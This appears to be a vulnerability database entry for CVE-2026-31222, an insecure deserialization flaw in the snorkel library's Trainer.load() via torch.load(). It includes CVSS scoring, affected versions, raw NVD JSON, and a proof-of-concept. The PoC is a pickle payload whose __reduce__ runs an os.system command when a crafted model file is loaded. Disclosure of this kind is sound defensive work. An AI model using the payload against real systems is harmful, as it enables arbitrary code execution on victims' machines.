Security Vulnerability Report
中文
CVE-2026-31222 CVSS 8.8 HIGH

CVE-2026-31222

Published: 2026-05-12 16:16:14
Last Modified: 2026-05-13 15:47:09
Source: [email protected]

Description

The snorkel library thru v0.10.0 contains an insecure deserialization vulnerability (CWE-502) in the Trainer.load() method of the Trainer class. The method loads model checkpoint files using torch.load() without enabling the security-restrictive weights_only=True parameter. This default behavior allows the deserialization of arbitrary Python objects via the Pickle module. A remote attacker can exploit this by providing a maliciously crafted model file, leading to arbitrary code execution on the victim's system when the file is loaded via the vulnerable method.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:snorkel:snorkel:*:*:*:*:*:*:*:* - VULNERABLE
snorkel <= 0.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os import torch import pickle # Define a malicious class that executes code upon deserialization class MaliciousPayload: def __reduce__(self): # The command to execute (e.g., creating a file or running a shell) # In a real attack, this might be a reverse shell return (os.system, ('echo "CVE-2026-31222 Exploited" > /tmp/pwned.txt',)) # Create the malicious object malicious_obj = MaliciousPayload() # Save the object using torch.save (which uses pickle internally) # This simulates a crafted model file print("[*] Creating malicious model file...") torch.save(malicious_obj, 'malicious_model.pt') print("[+] File 'malicious_model.pt' created successfully.") print("[*] When a victim loads this file using Trainer.load(), the command will execute.") # Simulation of the vulnerable load (commented out for safety) # trainer = Trainer() # trainer.load('malicious_model.pt')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31222", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:14.120", "lastModified": "2026-05-13T15:47:09.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The snorkel library thru v0.10.0 contains an insecure deserialization vulnerability (CWE-502) in the Trainer.load() method of the Trainer class. The method loads model checkpoint files using torch.load() without enabling the security-restrictive weights_only=True parameter. This default behavior allows the deserialization of arbitrary Python objects via the Pickle module. A remote attacker can exploit this by providing a maliciously crafted model file, leading to arbitrary code execution on the victim's system when the file is loaded via the vulnerable method."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:snorkel:snorkel:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.10.0", "matchCriteriaId": "F2E7FC3A-64C0-4F69-84DD-FC9BA0883D08"}]}]}], "references": [{"url": "https://github.com/snorkel-team/snorkel", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.notion.so/CVE-2026-31222-35d1e139318881db8398e0732af8df6d", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.